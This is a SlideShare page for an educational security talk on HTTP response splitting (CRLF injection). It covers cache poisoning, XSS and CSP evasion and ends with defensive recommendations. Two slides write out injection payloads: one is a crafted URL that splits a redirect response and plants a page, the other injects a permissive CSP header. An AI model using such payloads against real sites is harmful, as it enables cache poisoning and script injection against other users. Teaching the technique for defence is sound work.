By Sharath Unni 
@haxorhead
 Involved parties 
 Root problem 
 Example 
 Web cache poisoning 
 XSS 
 Other derived attacks 
 Recommendations
 There are always 3 parties (atleast) involved 
 Web server: hosts the application, with the 
vulnerability. (Tomcat, Ap...
 Failure to reject illegal user input 
 Specifically input containing CR and LF 
characters 
 Carriage Return and Line ...
 Normal request: 
http://www.the.site/new_page.asp?lang=german 
 Normal response: 
HTTP/1.0 302 Redirect 
Location: 
htt...
 Request (attacker): 
http://www.the.site/welcome.asp?lang=Foo%0d%0aConnection:%20Keep- 
Alive%0d%0aContent- 
Length:%200...
 Attack overview: 
 Attacker sends 2 requests: 
 1. HTTP response splitter (with %0d%0a) 
 2. An innocent request 
 P...
9 
1st attacker request 
(response splitter) 1st attacker request 
302 
302 
200 
(Pwned!) 
(response splitter) 
2nd attac...
 XSS: The second response is controlled by the 
attacker and JavaScript or HTML code can be 
inserted.
 Evade CSP – Content Security Policy – instructs 
the client browser from which location and/or 
which type of resources ...
 For developers: 
◦ Validate user input and remove CRLF characters 
(particularly when setting cookie and redirecting) 
...
Thank you 
@haxorhead
Http response splitting
Http response splitting
Http response splitting
Nächste SlideShare
Wird geladen in …5
×

Http response splitting

1.734 Aufrufe

Veröffentlicht am

HTTP Response Splitting or CRLF injection is an attack technique which enables various attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and our favorite, cross-site scripting (XSS). This attack technique, and the derived attacks from it, are relevant to most web environments and is the result of the application’s failure to reject illegal user input, in this case,
input containing malicious or unexpected characters.

The talk will cover the concept of the attack and will take you through some use cases.

Veröffentlicht in: Technologie
0 Kommentare
2 Gefällt mir
Statistik
Notizen
  • Als Erste(r) kommentieren

Keine Downloads
Aufrufe
Aufrufe insgesamt
1.734
Auf SlideShare
0
Aus Einbettungen
0
Anzahl an Einbettungen
291
Aktionen
Geteilt
0
Downloads
66
Kommentare
0
Gefällt mir
2
Einbettungen 0
Keine Einbettungen

Keine Notizen für die Folie
  • Source: OWASPAppsecEU2006
  • http://www.securityfocus.com/archive/1/411585
  • Http response splitting

    1. 1. By Sharath Unni @haxorhead
    2. 2.  Involved parties  Root problem  Example  Web cache poisoning  XSS  Other derived attacks  Recommendations
    3. 3.  There are always 3 parties (atleast) involved  Web server: hosts the application, with the vulnerability. (Tomcat, Apache, IIS etc.)  Target: An entity that interacts with the web server on behalf of the client. Eg: squid proxy  Attacker: initiates the attack
    4. 4.  Failure to reject illegal user input  Specifically input containing CR and LF characters  Carriage Return and Line Feed - %0d%0a (rn)  The data (user input) is included in an HTTP response header without any validation.  HTTP connection sharing  Caching – less control over the site content, improve performance, speed etc.
    5. 5.  Normal request: http://www.the.site/new_page.asp?lang=german  Normal response: HTTP/1.0 302 Redirect Location: http://www.the.site/new_page.asp?lang=german Connection: Keep-Alive Content-Length: 0
    6. 6.  Request (attacker): http://www.the.site/welcome.asp?lang=Foo%0d%0aConnection:%20Keep- Alive%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent- Type:%20text/html%0a%0aContent- Length:%2020%0d%0a%0d%0a<html>Pwned!</html>  Response: HTTP/1.0 302 Redirect Location: http://www.the.site/new_page.asp?lang=Foo Connection: Keep-Alive Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Content-Length: 20 <html>Pwned!</html>Connection: Keep-Alive Content-Length: 0
    7. 7.  Attack overview:  Attacker sends 2 requests:  1. HTTP response splitter (with %0d%0a)  2. An innocent request  Proxy will match 1st request -> 1st reponse  2nd request (innocent) -> 2nd response in cache (Pwned!)
    8. 8. 9 1st attacker request (response splitter) 1st attacker request 302 302 200 (Pwned!) (response splitter) 2nd attacker request (innocent /index.html) 2nd attacker request (innocent /index.html) 200 (Pwned!) 200 (Welcome)
    9. 9.  XSS: The second response is controlled by the attacker and JavaScript or HTML code can be inserted.
    10. 10.  Evade CSP – Content Security Policy – instructs the client browser from which location and/or which type of resources are allowed to be loaded  Certain browsers will interpret the first occurrence of HTTP header  HTTP Response header Content-Security-Policy: X-Content-Security-Policy Lang=en_US%0d%0aX-Content-Security-Policy: allow *
    11. 11.  For developers: ◦ Validate user input and remove CRLF characters (particularly when setting cookie and redirecting)  For proxy vendors: ◦ Avoid sharing server TCP connections among different virtual hosts. ◦ Maintain request host header correctly from the URL and not from the Host header.
    12. 12. Thank you @haxorhead

    ×